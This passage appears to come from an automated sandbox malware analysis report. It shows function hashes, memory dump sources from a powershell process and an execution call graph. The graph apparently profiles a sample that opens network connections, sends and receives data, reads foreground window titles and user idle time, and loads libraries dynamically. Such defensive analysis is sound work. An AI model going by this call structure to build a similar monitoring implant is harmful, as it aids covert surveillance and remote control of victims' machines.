                                                                        • Instruction ID: 8c99c99fc894c3fd347e191e0a4d8e68cb4454bd7a943a57e08e2177e251a0fb
                                                                        • Opcode Fuzzy Hash: df4e3a83ea8a3c786d514c25c46520c294658363d16c38028515e7b32cd8adf4
                                                                        • Instruction Fuzzy Hash: 9501F730508340EAE7344A15DC84767BB98DF81765F28C416FC594F2C2C379994AC7B1
                                                                        Function 0015D006 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510105680.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 467731de589330c911ec02ca092c7cd3520ff6c93d7a1c48189e1d69959b5455
                                                                        • Instruction ID: a2ca83bee30b9ab9b45a8e9002c5bcf6b4d4128d81bfc8be980ab00dd8f1e372
                                                                        • Opcode Fuzzy Hash: 467731de589330c911ec02ca092c7cd3520ff6c93d7a1c48189e1d69959b5455
                                                                        • Instruction Fuzzy Hash: D1015E6140E3C09FD7228B219C94B52BFA4DF52625F19C1DBE8988F2E3C3699849C772
                                                                        Function 00351B7F Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3212976d2dffd3abfa269c7bb016abf5e6816b8f9ce441fd1a43c2f8a082e395
                                                                        • Instruction ID: 191b2137b1c6b67c30d9a93dd59edbeba9e597023268220ec324f7762eb2cc44
                                                                        • Opcode Fuzzy Hash: 3212976d2dffd3abfa269c7bb016abf5e6816b8f9ce441fd1a43c2f8a082e395
                                                                        • Instruction Fuzzy Hash: 94E0D831F44344CFDF2A666090217AE77516FA2252F1581E6CC5097665DB348809C362

                                                                        Non-executed Functions

                                                                        Function 003500A0 Relevance: 15.4, Strings: 12, Instructions: 403COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (:,$(:,$(:,$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:,$L:,$L:,
                                                                        • API String ID: 0-2198573534
                                                                        • Opcode ID: b92b4b1a1607b208ac6df7306bdea566e41a46d82679f0c0b1c1e96ca64e5184
                                                                        • Instruction ID: 87a0f7288f78cdd495edbe199978d6a83c582f1768eb9bcddeeab99af0fdb087
                                                                        • Opcode Fuzzy Hash: b92b4b1a1607b208ac6df7306bdea566e41a46d82679f0c0b1c1e96ca64e5184
                                                                        • Instruction Fuzzy Hash: 23D15731700208EFDF1A9F64C810FBE77A6AF81312F158429ED459B2A1CB72DD89CB91

                                                                        Execution Graph

                                                                        Execution Coverage:5.6%
                                                                        Dynamic/Decrypted Code Coverage:19.8%
                                                                        Signature Coverage:3.4%
                                                                        Total number of Nodes:1510
                                                                        Total number of Limit Nodes:46
                                                                        execution_graph 53004 10006d60 53005 10006d69 53004->53005 53006 10006d72 53004->53006 53008 10006c5f 53005->53008 53028 10005af6 GetLastError 53008->53028 53010 10006c6c 53048 10006d7e 53010->53048 53012 10006c74 53057 100069f3 53012->53057 53015 10006c8b 53015->53006 53021 10006cc9 53081 10006368 19 API calls _abort 53021->53081 53022 10006ce6 53024 10006d12 53022->53024 53083 1000571e 19 API calls __dosmaperr 53022->53083 53027 10006cce 53024->53027 53084 100068c9 25 API calls 53024->53084 53082 1000571e 19 API calls __dosmaperr 53027->53082 53029 10005b12 53028->53029 53030 10005b0c 53028->53030 53034 10005b61 SetLastError 53029->53034 53086 1000637b 19 API calls 2 library calls 53029->53086 53085 10005e08 10 API calls 2 library calls 53030->53085 53033 10005b24 53038 10005b2c 53033->53038 53088 10005e5e 10 API calls 2 library calls 53033->53088 53034->53010 53036 10005b41 53036->53038 53039 10005b48 53036->53039 53087 1000571e 19 API calls __dosmaperr 53038->53087 53089 1000593c 19 API calls _abort 53039->53089 53040 10005b32 53042 10005b6d SetLastError 53040->53042 53091 100055a8 36 API calls _abort 53042->53091 53043 10005b53 53090 1000571e 19 API calls __dosmaperr 53043->53090 53047 10005b5a 53047->53034 53047->53042 53049 10006d8a ___DestructExceptionObject 53048->53049 53050 10005af6 _abort 36 API calls 53049->53050 53052 10006d94 53050->53052 53055 10006e18 _abort 53052->53055 53092 100055a8 36 API calls _abort 53052->53092 53093 10005671 RtlEnterCriticalSection 53052->53093 53094 1000571e 19 API calls __dosmaperr 53052->53094 53095 10006e0f RtlLeaveCriticalSection _abort 53052->53095 53055->53012 53096 100054a7 53057->53096 53060 10006a14 GetOEMCP 53063 10006a3d 53060->53063 53061 10006a26 53062 10006a2b GetACP 53061->53062 53061->53063 53062->53063 53063->53015 53064 100056d0 53063->53064 53065 1000570e 53064->53065 53069 100056de _abort 53064->53069 53107 10006368 19 API calls _abort 53065->53107 53066 100056f9 RtlAllocateHeap 53068 1000570c 53066->53068 53066->53069 53068->53027 53071 10006e20 53068->53071 53069->53065 53069->53066 53106 1000474f 7 API calls 2 library calls 53069->53106 53072 100069f3 38 API calls 53071->53072 53073 10006e3f 53072->53073 53076 10006e90 IsValidCodePage 53073->53076 53078 10006e46 53073->53078 53080 10006eb5 ___scrt_fastfail 53073->53080 53075 10006cc1 53075->53021 53075->53022 53077 10006ea2 GetCPInfo 53076->53077 53076->53078 53077->53078 53077->53080 53118 10002ada 53078->53118 53108 10006acb GetCPInfo 53080->53108 53081->53027 53082->53015 53083->53024 53084->53027 53085->53029 53086->53033 53087->53040 53088->53036 53089->53043 53090->53047 53093->53052 53094->53052 53095->53052 53097 100054c4 53096->53097 53098 100054ba 53096->53098 53097->53098 53099 10005af6 _abort 36 API calls 53097->53099 53098->53060 53098->53061 53100 100054e5 53099->53100 53104 10007a00 36 API calls __fassign 53100->53104 53102 100054fe 53105 10007a2d 36 API calls __fassign 53102->53105 53104->53102 53105->53098 53106->53069 53107->53068 53109 10006baf 53108->53109 53114 10006b05 53108->53114 53111 10002ada _ValidateLocalCookies 5 API calls 53109->53111 53113 10006c5b 53111->53113 53113->53078 53125 100086e4 53114->53125 53117 10008a3e 41 API calls 53117->53109 53119 10002ae3 53118->53119 53120 10002ae5 IsProcessorFeaturePresent 53118->53120 53119->53075 53122 10002b58 53120->53122 53195 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53122->53195 53124 10002c3b 53124->53075 53126 100054a7 __fassign 36 API calls 53125->53126 53127 10008704 MultiByteToWideChar 53126->53127 53129 10008742 53127->53129 53130 100087da 53127->53130 53132 100056d0 20 API calls 53129->53132 53136 10008763 ___scrt_fastfail 53129->53136 53131 10002ada _ValidateLocalCookies 5 API calls 53130->53131 53133 10006b66 53131->53133 53132->53136 53139 10008a3e 53133->53139 53134 100087d4 53144 10008801 19 API calls _free 53134->53144 53136->53134 53137 100087a8 MultiByteToWideChar 53136->53137 53137->53134 53138 100087c4 GetStringTypeW 53137->53138 53138->53134 53140 100054a7 __fassign 36 API calls 53139->53140 53141 10008a51 53140->53141 53145 10008821 53141->53145 53144->53130 53146 1000883c 53145->53146 53147 10008862 MultiByteToWideChar 53146->53147 53148 10008a16 53147->53148 53149 1000888c 53147->53149 53150 10002ada _ValidateLocalCookies 5 API calls 53148->53150 53152 100056d0 20 API calls 53149->53152 53156 100088ad 53149->53156 53151 10006b87 53150->53151 53151->53117 53152->53156 53153 100088f6 MultiByteToWideChar 53154 10008962 53153->53154 53155 1000890f 53153->53155 53181 10008801 19 API calls _free 53154->53181 53172 10005f19 53155->53172 53156->53153 53156->53154 53160 10008971 53162 100056d0 20 API calls 53160->53162 53165 10008992 53160->53165 53161 10008939 53161->53154 53163 10005f19 10 API calls 53161->53163 53162->53165 53163->53154 53164 10008a07 53180 10008801 19 API calls _free 53164->53180 53165->53164 53166 10005f19 10 API calls 53165->53166 53168 100089e6 53166->53168 53168->53164 53169 100089f5 WideCharToMultiByte 53168->53169 53169->53164 53170 10008a35 53169->53170 53182 10008801 19 API calls _free 53170->53182 53183 10005c45 53172->53183 53174 10005f40 53175 10005f49 53174->53175 53187 10005fa1 9 API calls 2 library calls 53174->53187 53178 10002ada _ValidateLocalCookies 5 API calls 53175->53178 53177 10005f89 LCMapStringW 53177->53175 53179 10005f9b 53178->53179 53179->53154 53179->53160 53179->53161 53180->53154 53181->53148 53182->53154 53184 10005c75 __crt_fast_encode_pointer 53183->53184 53186 10005c71 53183->53186 53184->53174 53186->53184 53188 10005ce1 53186->53188 53187->53177 53189 10005d02 LoadLibraryExW 53188->53189 53193 10005cf7 53188->53193 53190 10005d37 53189->53190 53191 10005d1f GetLastError 53189->53191 53190->53193 53194 10005d4e FreeLibrary 53190->53194 53191->53190 53192 10005d2a LoadLibraryExW 53191->53192 53192->53190 53193->53186 53194->53193 53195->53124 53196 4165a0 53207 401e65 53196->53207 53198 4165b0 53212 4020f6 53198->53212 53201 401e65 22 API calls 53202 4165c6 53201->53202 53203 4020f6 28 API calls 53202->53203 53204 4165d1 53203->53204 53218 41292a 53204->53218 53208 401e6d 53207->53208 53209 401e75 53208->53209 53237 402158 22 API calls 53208->53237 53209->53198 53213 40210c 53212->53213 53238 4023ce 53213->53238 53215 402126 53242 402569 53215->53242 53217 402134 53217->53201 53290 40482d 53218->53290 53220 41293e 53297 4048c8 connect 53220->53297 53224 41295f 53362 402f10 53224->53362 53233 401fd8 11 API calls 53234 412991 53233->53234 53235 401fd8 11 API calls 53234->53235 53236 412999 53235->53236 53239 402428 53238->53239 53240 4023d8 53238->53240 53239->53215 53240->53239 53252 4027a7 53240->53252 53263 402888 53242->53263 53244 40257d 53245 402592 53244->53245 53246 4025a7 53244->53246 53268 402a34 22 API calls 53245->53268 53270 4028e8 53246->53270 53249 40259b 53269 4029da 22 API calls 53249->53269 53251 4025a5 53251->53217 53253 402e21 53252->53253 53256 4016b4 53253->53256 53255 402e30 53255->53239 53257 4016c6 53256->53257 53258 4016cb 53256->53258 53262 43bd19 11 API calls _abort 53257->53262 53258->53257 53259 4016f3 53258->53259 53259->53255 53261 43bd18 53262->53261 53264 402890 53263->53264 53265 402898 53264->53265 53281 402ca3 22 API calls 53264->53281 53265->53244 53268->53249 53269->53251 53271 4028f1 53270->53271 53272 402953 53271->53272 53274 4028fb 53271->53274 53288 4028a4 22 API calls 53272->53288 53276 402904 53274->53276 53278 402917 53274->53278 53282 402cae 53276->53282 53279 402915 53278->53279 53280 4023ce 11 API calls 53278->53280 53279->53251 53280->53279 53283 402cb8 __EH_prolog 53282->53283 53289 402e54 22 API calls 53283->53289 53285 4023ce 11 API calls 53287 402d92 53285->53287 53286 402d24 53286->53285 53287->53279 53289->53286 53291 404846 socket 53290->53291 53292 404839 53290->53292 53294 404860 CreateEventW 53291->53294 53295 404842 53291->53295 53403 40489e WSAStartup 53292->53403 53294->53220 53295->53220 53296 40483e 53296->53291 53296->53295 53298 404a1b 53297->53298 53299 4048ee 53297->53299 53300 404a21 WSAGetLastError 53298->53300 53350 40497e 53298->53350 53301 404923 53299->53301 53299->53350 53404 40531e 53299->53404 53302 404a31 53300->53302 53300->53350 53439 420c60 27 API calls 53301->53439 53305 404932 53302->53305 53306 404a36 53302->53306 53312 402093 28 API calls 53305->53312 53444 41cae1 30 API calls 53306->53444 53307 40492b 53307->53305 53311 404941 53307->53311 53308 40490f 53409 402093 53308->53409 53310 404a40 53445 4052fd 28 API calls 53310->53445 53321 404950 53311->53321 53322 404987 53311->53322 53315 404a80 53312->53315 53319 402093 28 API calls 53315->53319 53323 404a8f 53319->53323 53326 402093 28 API calls 53321->53326 53441 421a40 54 API calls 53322->53441 53327 41b4ef 80 API calls 53323->53327 53330 40495f 53326->53330 53327->53350 53329 40498f 53332 4049c4 53329->53332 53333 404994 53329->53333 53334 402093 28 API calls 53330->53334 53443 420e06 28 API calls 53332->53443 53337 402093 28 API calls 53333->53337 53338 40496e 53334->53338 53340 4049a3 53337->53340 53341 41b4ef 80 API calls 53338->53341 53339 4049cc 53342 4049f9 CreateEventW CreateEventW 53339->53342 53345 402093 28 API calls 53339->53345 53343 402093 28 API calls 53340->53343 53344 404973 53341->53344 53342->53350 53346 4049b2 53343->53346 53440 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53344->53440 53348 4049e2 53345->53348 53349 41b4ef 80 API calls 53346->53349 53351 402093 28 API calls 53348->53351 53352 4049b7 53349->53352 53357 402f31 53350->53357 53353 4049f1 53351->53353 53442 4210b2 52 API calls 53352->53442 53355 41b4ef 80 API calls 53353->53355 53356 4049f6 53355->53356 53356->53342 53358 4020df 11 API calls 53357->53358 53359 402f3d 53358->53359 53360 4032a0 28 API calls 53359->53360 53361 402f59 53360->53361 53361->53224 53507 401fb0 53362->53507 53364 402f1e 53365 402055 11 API calls 53364->53365 53366 402f2d 53365->53366 53367 404aa1 53366->53367 53368 404ab4 53367->53368 53510 40520c 53368->53510 53370 404ac9 ctype 53371 404b40 WaitForSingleObject 53370->53371 53372 404b20 53370->53372 53374 404b56 53371->53374 53373 404b32 send 53372->53373 53375 404b7b 53373->53375 53516 42103a 54 API calls 53374->53516 53378 401fd8 11 API calls 53375->53378 53377 404b69 SetEvent 53377->53375 53379 404b83 53378->53379 53380 401fd8 11 API calls 53379->53380 53381 404b8b 53380->53381 53382 401fd8 53381->53382 53383 4023ce 11 API calls 53382->53383 53384 401fe1 53383->53384 53385 404c10 53384->53385 53386 4020df 11 API calls 53385->53386 53387 404c27 53386->53387 53388 4020df 11 API calls 53387->53388 53394 404c30 53388->53394 53393 404ca1 53574 404e26 WaitForSingleObject 53393->53574 53394->53393 53396 401fd8 11 API calls 53394->53396 53534 43bd51 53394->53534 53541 404b96 53394->53541 53547 4020b7 53394->53547 53553 401fe2 53394->53553 53562 404cc3 53394->53562 53396->53394 53398 401fd8 11 API calls 53399 404cb1 53398->53399 53400 401fd8 11 API calls 53399->53400 53401 404cba 53400->53401 53401->53233 53403->53296 53446 4020df 53404->53446 53406 40532a 53450 4032a0 53406->53450 53408 405346 53408->53308 53410 40209b 53409->53410 53411 4023ce 11 API calls 53410->53411 53412 4020a6 53411->53412 53454 4024ed 53412->53454 53415 41b4ef 53416 41b5a0 53415->53416 53417 41b505 GetLocalTime 53415->53417 53419 401fd8 11 API calls 53416->53419 53418 40531e 28 API calls 53417->53418 53420 41b547 53418->53420 53421 41b5a8 53419->53421 53465 406383 53420->53465 53423 401fd8 11 API calls 53421->53423 53425 41b5b0 53423->53425 53425->53301 53426 402f10 28 API calls 53427 41b55f 53426->53427 53428 406383 28 API calls 53427->53428 53429 41b56b 53428->53429 53470 407200 77 API calls 53429->53470 53431 41b579 53432 401fd8 11 API calls 53431->53432 53433 41b585 53432->53433 53434 401fd8 11 API calls 53433->53434 53435 41b58e 53434->53435 53436 401fd8 11 API calls 53435->53436 53437 41b597 53436->53437 53438 401fd8 11 API calls 53437->53438 53438->53416 53439->53307 53440->53350 53441->53329 53442->53344 53443->53339 53444->53310 53447 4020e7 53446->53447 53448 4023ce 11 API calls 53447->53448 53449 4020f2 53448->53449 53449->53406 53451 4032aa 53450->53451 53452 4032c9 53451->53452 53453 4028e8 28 API calls 53451->53453 53452->53408 53453->53452 53455 4024f9 53454->53455 53458 40250a 53455->53458 53457 4020b1 53457->53415 53459 40251a 53458->53459 53460 402520 53459->53460 53461 402535 53459->53461 53463 402569 28 API calls 53460->53463 53462 4028e8 28 API calls 53461->53462 53464 402533 53462->53464 53463->53464 53464->53457 53471 4051ef 53465->53471 53467 406391 53475 402055 53467->53475 53470->53431 53472 4051fb 53471->53472 53481 405274 53472->53481 53474 405208 53474->53467 53476 402061 53475->53476 53477 4023ce 11 API calls 53476->53477 53478 40207b 53477->53478 53503 40267a 53478->53503 53482 405282 53481->53482 53483 405288 53482->53483 53484 40529e 53482->53484 53492 4025f0 53483->53492 53486 4052f5 53484->53486 53487 4052b6 53484->53487 53501 4028a4 22 API calls 53486->53501 53490 4028e8 28 API calls 53487->53490 53491 40529c 53487->53491 53490->53491 53491->53474 53493 402888 22 API calls 53492->53493 53494 402602 53493->53494 53495 402672 53494->53495 53496 402629 53494->53496 53502 4028a4 22 API calls 53495->53502 53499 4028e8 28 API calls 53496->53499 53500 40263b 53496->53500 53499->53500 53500->53491 53504 40268b 53503->53504 53505 4023ce 11 API calls 53504->53505 53506 40208d 53505->53506 53506->53426 53508 4025f0 28 API calls 53507->53508 53509 401fbd 53508->53509 53509->53364 53511 405214 53510->53511 53512 4023ce 11 API calls 53511->53512 53513 40521f 53512->53513 53517 405234 53513->53517 53515 40522e 53515->53370 53516->53377 53518 405240 53517->53518 53519 40526e 53517->53519 53521 4028e8 28 API calls 53518->53521 53533 4028a4 22 API calls 53519->53533 53523 40524a 53521->53523 53523->53515 53536 446137 __Getctype 53534->53536 53535 446175 53588 4405dd 20 API calls _free 53535->53588 53536->53535 53538 446160 RtlAllocateHeap 53536->53538 53587 442f80 7 API calls 2 library calls 53536->53587 53538->53536 53539 446173 53538->53539 53539->53394 53542 404ba0 WaitForSingleObject 53541->53542 53543 404bcd recv 53541->53543 53589 421076 54 API calls 53542->53589 53545 404be0 53543->53545 53545->53394 53546 404bbc SetEvent 53546->53545 53548 4020bf 53547->53548 53549 4023ce 11 API calls 53548->53549 53550 4020ca 53549->53550 53551 40250a 28 API calls 53550->53551 53552 4020d9 53551->53552 53552->53394 53554 401ff1 53553->53554 53555 402039 53553->53555 53556 4023ce 11 API calls 53554->53556 53555->53394 53557 401ffa 53556->53557 53558 40203c 53557->53558 53559 402015 53557->53559 53560 40267a 11 API calls 53558->53560 53590 403098 28 API calls 53559->53590 53560->53555 53563 4020df 11 API calls 53562->53563 53573 404cde 53563->53573 53564 404e13 53565 401fd8 11 API calls 53564->53565 53566 404e1c 53565->53566 53566->53394 53567 4041a2 28 API calls 53567->53573 53568 401fe2 28 API calls 53568->53573 53569 401fd8 11 API calls 53569->53573 53570 4020f6 28 API calls 53570->53573 53573->53564 53573->53567 53573->53568 53573->53569 53573->53570 53591 401fc0 53573->53591 53575 404e40 SetEvent CloseHandle 53574->53575 53576 404e57 closesocket 53574->53576 53577 404ca8 53575->53577 53578 404e64 53576->53578 53577->53398 53579 404e7a 53578->53579 53891 4050e4 84 API calls 53578->53891 53580 404e8c WaitForSingleObject 53579->53580 53581 404ece SetEvent CloseHandle 53579->53581 53892 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53580->53892 53581->53577 53584 404e9b SetEvent WaitForSingleObject 53893 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53584->53893 53586 404eb3 SetEvent CloseHandle CloseHandle 53586->53581 53587->53536 53588->53539 53589->53546 53590->53555 53592 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53591->53592 53593 401fc9 53591->53593 53592->53573 53596 415aea 53592->53596 53595 4025e0 28 API calls 53593->53595 53595->53592 53597 4020f6 28 API calls 53596->53597 53598 415b0c SetEvent 53597->53598 53599 415b21 53598->53599 53675 4041a2 53599->53675 53602 4020f6 28 API calls 53603 415b4b 53602->53603 53604 4020f6 28 API calls 53603->53604 53605 415b5d 53604->53605 53678 41be1b 53605->53678 53609 415b86 GetTickCount 53700 41bb8e 53609->53700 53610 415ce5 53672 415cf9 53610->53672 53674 415cd6 53610->53674 53615 401fd8 11 API calls 53617 41709e 53615->53617 53619 401fd8 11 API calls 53617->53619 53618 415ba3 53620 41bb8e 28 API calls 53618->53620 53621 4170aa 53619->53621 53622 415bae 53620->53622 53706 41ba96 53622->53706 53627 401e65 22 API calls 53628 415bd8 53627->53628 53629 402f31 28 API calls 53628->53629 53630 415be6 53629->53630 53715 402ea1 28 API calls 53630->53715 53632 415bf5 53633 402f10 28 API calls 53632->53633 53634 415c04 53633->53634 53716 402ea1 28 API calls 53634->53716 53636 415c13 53637 402f10 28 API calls 53636->53637 53638 415c1f 53637->53638 53717 402ea1 28 API calls 53638->53717 53640 415c29 53641 404aa1 61 API calls 53640->53641 53642 415c38 53641->53642 53643 401fd8 11 API calls 53642->53643 53644 415c41 53643->53644 53645 401fd8 11 API calls 53644->53645 53646 415c4d 53645->53646 53647 401fd8 11 API calls 53646->53647 53648 415c59 53647->53648 53649 401fd8 11 API calls 53648->53649 53650 415c65 53649->53650 53651 401fd8 11 API calls 53650->53651 53652 415c71 53651->53652 53653 401fd8 11 API calls 53652->53653 53654 415c7d 53653->53654 53718 401f09 53654->53718 53657 401fd8 11 API calls 53658 415c8f 53657->53658 53659 401fd8 11 API calls 53658->53659 53660 415c98 53659->53660 53661 401e65 22 API calls 53660->53661 53662 415ca3 53661->53662 53721 43baac 53662->53721 53665 415cb5 53668 415cc3 53665->53668 53669 415cce 53665->53669 53666 415cdb 53667 401e65 22 API calls 53666->53667 53667->53610 53725 404ff4 82 API calls 53668->53725 53726 404f51 53669->53726 53741 4050e4 84 API calls 53672->53741 53673 415cc9 53673->53674 53742 401e8d 53674->53742 53748 40423a 53675->53748 53679 4020df 11 API calls 53678->53679 53680 41be2e 53679->53680 53683 41bea0 53680->53683 53687 4041a2 28 API calls 53680->53687 53692 401fe2 28 API calls 53680->53692 53695 401fd8 11 API calls 53680->53695 53699 41be9e 53680->53699 53754 41ce34 28 API calls 53680->53754 53681 401fd8 11 API calls 53682 41bed0 53681->53682 53684 401fd8 11 API calls 53682->53684 53686 4041a2 28 API calls 53683->53686 53685 41bed8 53684->53685 53688 401fd8 11 API calls 53685->53688 53689 41beac 53686->53689 53687->53680 53690 415b66 53688->53690 53691 401fe2 28 API calls 53689->53691 53690->53609 53690->53610 53690->53674 53693 41beb5 53691->53693 53692->53680 53694 401fd8 11 API calls 53693->53694 53696 41bebd 53694->53696 53695->53680 53755 41ce34 28 API calls 53696->53755 53699->53681 53756 441e81 53700->53756 53703 402093 28 API calls 53704 415b97 53703->53704 53705 41bae6 GetLastInputInfo GetTickCount 53704->53705 53705->53618 53765 436e90 53706->53765 53711 41bd1e 53712 41bd2b 53711->53712 53713 4020b7 28 API calls 53712->53713 53714 415bca 53713->53714 53714->53627 53715->53632 53716->53636 53717->53640 53719 402252 11 API calls 53718->53719 53720 401f12 53719->53720 53720->53657 53722 43bac5 _strftime 53721->53722 53814 43ae03 53722->53814 53724 415cb0 53724->53665 53724->53666 53725->53673 53727 404f65 53726->53727 53728 404fea 53726->53728 53729 404f6e 53727->53729 53730 404fc0 CreateEventA CreateThread 53727->53730 53731 404f7d GetLocalTime 53727->53731 53728->53674 53729->53730 53730->53728 53885 405150 53730->53885 53732 41bb8e 28 API calls 53731->53732 53733 404f91 53732->53733 53884 4052fd 28 API calls 53733->53884 53741->53673 53743 402163 53742->53743 53744 40219f 53743->53744 53889 402730 11 API calls 53743->53889 53744->53615 53746 402184 53890 402712 11 API calls std::_Deallocate 53746->53890 53749 404243 53748->53749 53750 4023ce 11 API calls 53749->53750 53751 40424e 53750->53751 53752 402569 28 API calls 53751->53752 53753 4041b5 53752->53753 53753->53602 53754->53680 53755->53699 53757 441e8d 53756->53757 53760 441c7d 53757->53760 53759 41bbb2 53759->53703 53761 441c94 53760->53761 53763 441ccb __cftoe 53761->53763 53764 4405dd 20 API calls _free 53761->53764 53763->53759 53764->53763 53766 41bab5 GetForegroundWindow GetWindowTextW 53765->53766 53767 40417e 53766->53767 53768 404186 53767->53768 53773 402252 53768->53773 53770 404191 53777 4041bc 53770->53777 53774 4022ac 53773->53774 53775 40225c 53773->53775 53774->53770 53775->53774 53781 402779 11 API calls std::_Deallocate 53775->53781 53778 4041c8 53777->53778 53782 4041d9 53778->53782 53780 40419c 53780->53711 53781->53774 53783 4041e9 53782->53783 53784 404206 53783->53784 53785 4041ef 53783->53785 53799 4027e6 53784->53799 53789 404267 53785->53789 53788 404204 53788->53780 53790 402888 22 API calls 53789->53790 53791 40427b 53790->53791 53792 404290 53791->53792 53793 4042a5 53791->53793 53810 4042df 22 API calls 53792->53810 53794 4027e6 28 API calls 53793->53794 53798 4042a3 53794->53798 53796 404299 53811 402c48 22 API calls 53796->53811 53798->53788 53800 4027ef 53799->53800 53801 402851 53800->53801 53802 4027f9 53800->53802 53813 4028a4 22 API calls 53801->53813 53805 402802 53802->53805 53807 402815 53802->53807 53812 402aea 28 API calls __EH_prolog 53805->53812 53808 402813 53807->53808 53809 402252 11 API calls 53807->53809 53808->53788 53809->53808 53810->53796 53811->53798 53812->53808 53830 43ba0a 53814->53830 53816 43ae50 53836 43a7b7 53816->53836 53818 43ae15 53818->53816 53819 43ae2a 53818->53819 53821 43ae2f __cftoe 53818->53821 53835 4405dd 20 API calls _free 53819->53835 53821->53724 53823 43ae5c 53824 43ae8b 53823->53824 53844 43ba4f 40 API calls __Tolower 53823->53844 53827 43aef7 53824->53827 53845 43b9b6 20 API calls 2 library calls 53824->53845 53846 43b9b6 20 API calls 2 library calls 53827->53846 53828 43afbe _strftime 53828->53821 53847 4405dd 20 API calls _free 53828->53847 53831 43ba22 53830->53831 53832 43ba0f 53830->53832 53831->53818 53848 4405dd 20 API calls _free 53832->53848 53834 43ba14 __cftoe 53834->53818 53835->53821 53837 43a7d4 53836->53837 53838 43a7ca 53836->53838 53837->53838 53849 448215 GetLastError 53837->53849 53838->53823 53840 43a7f5 53870 448364 36 API calls __Toupper 53840->53870 53842 43a80e 53871 448391 36 API calls __cftoe 53842->53871 53844->53823 53845->53827 53846->53828 53847->53821 53848->53834 53850 448237 53849->53850 53851 44822b 53849->53851 53873 445af3 20 API calls 3 library calls 53850->53873 53872 4487bc 11 API calls 2 library calls 53851->53872 53854 448231 53854->53850 53856 448280 SetLastError 53854->53856 53855 448243 53857 44824b 53855->53857 53880 448812 11 API calls 2 library calls 53855->53880 53856->53840 53874 446782 53857->53874 53860 448260 53860->53857 53862 448267 53860->53862 53861 448251 53864 44828c SetLastError 53861->53864 53881 448087 20 API calls __Toupper 53862->53881 53882 4460f4 36 API calls 4 library calls 53864->53882 53865 448272 53867 446782 _free 20 API calls 53865->53867 53869 448279 53867->53869 53868 448298 53869->53856 53869->53864 53870->53842 53871->53838 53872->53854 53873->53855 53875 44678d HeapFree 53874->53875 53879 4467b6 _free 53874->53879 53876 4467a2 53875->53876 53875->53879 53883 4405dd 20 API calls _free 53876->53883 53878 4467a8 GetLastError 53878->53879 53879->53861 53880->53860 53881->53865 53882->53868 53883->53878 53888 40515c 102 API calls 53885->53888 53887 405159 53888->53887 53889->53746 53890->53744 53891->53579 53892->53584 53893->53586 53894 445847 53895 445852 53894->53895 53897 44587b 53895->53897 53898 445877 53895->53898 53900 448a84 53895->53900 53907 44589f DeleteCriticalSection 53897->53907 53908 4484ca 53900->53908 53903 448ac9 InitializeCriticalSectionAndSpinCount 53904 448ab4 53903->53904 53915 434fcb 53904->53915 53906 448ae0 53906->53895 53907->53898 53909 4484fa 53908->53909 53912 4484f6 53908->53912 53909->53903 53909->53904 53910 44851a 53910->53909 53913 448526 GetProcAddress 53910->53913 53912->53909 53912->53910 53922 448566 53912->53922 53914 448536 __crt_fast_encode_pointer 53913->53914 53914->53909 53916 434fd6 IsProcessorFeaturePresent 53915->53916 53917 434fd4 53915->53917 53919 435018 53916->53919 53917->53906 53929 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53919->53929 53921 4350fb 53921->53906 53923 448587 LoadLibraryExW 53922->53923 53924 44857c 53922->53924 53925 4485a4 GetLastError 53923->53925 53928 4485bc 53923->53928 53924->53912 53926 4485af LoadLibraryExW 53925->53926 53925->53928 53926->53928 53927 4485d3 FreeLibrary 53927->53924 53928->53924 53928->53927 53929->53921 53930 434887 53931 434893 ___FrameUnwindToState 53930->53931 53957 434596 53931->53957 53933 43489a 53935 4348c3 53933->53935 54263 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 53933->54263 53939 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53935->53939 53968 444251 53935->53968 53946 434962 53939->53946 54264 4433e7 36 API calls 6 library calls 53939->54264 53940 4348e2 ___FrameUnwindToState 53976 434b14 53946->53976 53958 43459f 53957->53958 54269 434c52 IsProcessorFeaturePresent 53958->54269 53960 4345ab 54270 438f31 53960->54270 53962 4345b0 53967 4345b4 53962->53967 54279 4440bf 53962->54279 53965 4345cb 53965->53933 53967->53933 53969 444268 53968->53969 53970 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53969->53970 53971 4348dc 53970->53971 53971->53940 53972 4441f5 53971->53972 53973 444224 53972->53973 53974 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53973->53974 53975 44424d 53974->53975 53975->53939 53977 436e90 ___scrt_get_show_window_mode 53976->53977 53978 434b27 GetStartupInfoW 53977->53978 53979 434968 53978->53979 53980 4441a2 53979->53980 54329 44f059 53980->54329 53982 434971 53985 40e9c5 53982->53985 53983 4441ab 53983->53982 54333 446815 36 API calls 53983->54333 54463 41cb50 LoadLibraryA GetProcAddress 53985->54463 53987 